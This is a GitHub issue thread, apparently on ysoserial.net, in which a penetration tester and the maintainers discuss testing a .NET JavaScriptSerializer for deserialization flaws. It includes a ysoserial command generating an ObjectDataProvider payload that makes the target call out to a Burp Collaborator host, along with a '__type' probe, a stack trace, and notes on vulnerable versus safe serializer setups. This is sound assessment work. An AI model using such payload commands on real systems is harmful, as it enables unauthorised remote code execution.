Question on assessment - Value cannot be null.Parameter name: type

Question

Question on assessment - Value cannot be null.Parameter name: type

Himself132 opened this issue 4 years ago · comments

Hello,

I definitely have situation where an app i am assessing is allowing __type declaration but no matter what i attempt with payloads i get the same response if i include any value for __type. Not looking for help exploiting this for my assessment, just some direction. All of the research I've done is showing this should be exploitable. Kind of want to know what the next step could be in discovery of whether or not this is exploitable but i hit a wall on the __type null problem. MVC 3

I have used Freddy which is certain there is a problem here.

ysoserial.exe -c "nslookup SCRUBBED.burpcollaborator.net" -g ObjectDataProvider -f JavaScriptSerializer

And I'm sending this payload to the target and can't get anything to run, it's a windows box.

Payload that does the detection looks like (or similar) - I can insert null and then i get an error message saying it wants a true or false for another parameter, which I've also tried appending but s till get the error about type not being null.

{"__type":""}

Error looks like this:

`HTTP/1.1 500 Internal Server Error
Date: Mon, 20 Apr 2020 15:49:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9702
Connection: close
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, HEAD
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

<title>Value cannot be null.
Parameter name: type</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style>

Server Error in '/SCRUBBED' Application.

Value cannot be null.
Parameter name: type

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.ArgumentNullException: Value cannot be null.
Parameter name: type

Source Error:

`An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.`

Stack Trace:

[ArgumentNullException: Value cannot be null.
Parameter name: type]
   System.Activator.CreateInstance(Type type, Boolean nonPublic) +14216720
   System.Activator.CreateInstance(Type type) +12
   System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +447
   System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +94
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +222
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +599
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +147
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +599
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +147
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer) +110
   System.Web.Script.Serialization.JavaScriptSerializer.Deserialize(JavaScriptSerializer serializer, String input, Type type, Int32 depthLimit) +46
   Spl.Sped.Web.Extensions.CustomJsonValueProviderFactory.GetDeserializedObject(ControllerContext controllerContext) +278
   Spl.Sped.Web.Extensions.CustomJsonValueProviderFactory.GetValueProvider(ControllerContext controllerContext) +23
   System.Web.Mvc.<>c__DisplayClassc.<GetValueProvider>b__7(ValueProviderFactory factory) +48
   System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +238
   System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +281
   System.Collections.Generic.List`1..ctor(IEnumerable`1 collection) +504
   System.Linq.Enumerable.ToList(IEnumerable`1 source) +69
   System.Web.Mvc.ValueProviderFactoryCollection.GetValueProvider(ControllerContext controllerContext) +421
   System.Web.Mvc.ControllerBase.get_ValueProvider() +39
   System.Web.Mvc.ControllerActionInvoker.GetParameterValue(ControllerContext controllerContext, ParameterDescriptor parameterDescriptor) +77
   System.Web.Mvc.ControllerActionInvoker.GetParameterValues(ControllerContext controllerContext, ActionDescriptor actionDescriptor) +137
   System.Web.Mvc.ControllerActionInvoker.InvokeAction(ControllerContext controllerContext, String actionName) +658
   System.Web.Mvc.Controller.ExecuteCore() +143
   System.Web.Mvc.ControllerBase.Execute(RequestContext requestContext) +91
   System.Web.Mvc.<>c__DisplayClassb.<BeginProcessRequest>b__5() +57
   System.Web.Mvc.Async.<>c__DisplayClass1.<MakeVoidDelegate>b__0() +25
   System.Web.Mvc.<>c__DisplayClasse.<EndProcessRequest>b__d() +36
   System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +648
   System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step) +213
   System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +131

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3535.0 `

Soroush Dalili · Answer 1 · Wed Apr 22 2020 21:43:45 GMT+0800 (China Standard Time)

You need to be able to control the object type in this case. Please have a look at https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf

Himself132 · Answer 2 · Wed Apr 22 2020 23:16:59 GMT+0800 (China Standard Time)

Hello, thanks for the response - I think that is the problem, how can I determine whether or not that is the case without access to the source code? I have used payloads and tried all sorts of intelligent fuzzing to try and determine that. Are there any additional detection methods I can use to see if I can control the object type? I have reviewed that document previously and any other documentation I can find related to the JavaScriptSerializer as shown above.

Soroush Dalili · Answer 3 · Thu Apr 23 2020 19:22:10 GMT+0800 (China Standard Time)

Reading the stacktrace it seems you are dealing with a JavaScriptSerializer here. Not much you can do other than trying some payloads to see whether you can get a DNS request back for example. It is probably not vulnerable as you have tried it all.

Here are my notes on this one based on reading the articles:

This should not be vulnerable by default. However, it can become vulnerable when a resolver is used that can allow dangerous types. An example of this resolver is SimpleTypeResolver that can be seen in: https://referencesource.microsoft.com/#System.Web.Extensions/Script/Serialization/SimpleTypeResolver.cs,7b048d54a7d79e87

The following code therefore will be vulnerable:

JavaScriptSerializer jss = new JavaScriptSerializer(new SimpleTypeResolver());
var json_req = jss.Deserialize<int>(payload);

The following code will not be vulnerable:

JavaScriptSerializer jss = new JavaScriptSerializer();
var json_req = jss.Deserialize<int>(payload);

This feature can make JavaScriptSerializer without a resolver an ideal choice as a secure serialiser.

Alvaro Muñoz · Answer 4 · Tue May 05 2020 22:47:55 GMT+0800 (China Standard Time)

@Himself132 what is the payload you are using? by the stacktrace it seems you are sending a null __type

Himself132 · Answer 5 · Thu May 07 2020 23:29:05 GMT+0800 (China Standard Time)

@pwntester - hey just wanted to give an update, I actually got remote code execution. They are using LINQ which is dynamic. The following payload worked, interestingly enough it still just shows a generic error message and gives no indication of exploit other than the out of band feedback dns call.

So i guess the question is, would there have been a detection payload that would've worked here? In case there is a dictionary for deserialization issues i could add a payload to? Or are we stuck with the out of band detection which can be problematic from a false positive perspective?

The original payload was FREDDY just sending

{"__type":""}

the exploit for RCE was

as referenced in this link

https://insinuator.net/2016/10/linq-injection-from-attacking-filters-to-code-execution/

Soroush Dalili · Answer 6 · Mon Jun 08 2020 20:14:05 GMT+0800 (China Standard Time)

Thank you for showing the PoC and how it works. This is very interesting but it is not related to serialization as far as I can see.

We will need another extension to find this kind of issues - perhaps it should be added to Burp Suite scanner engine itself.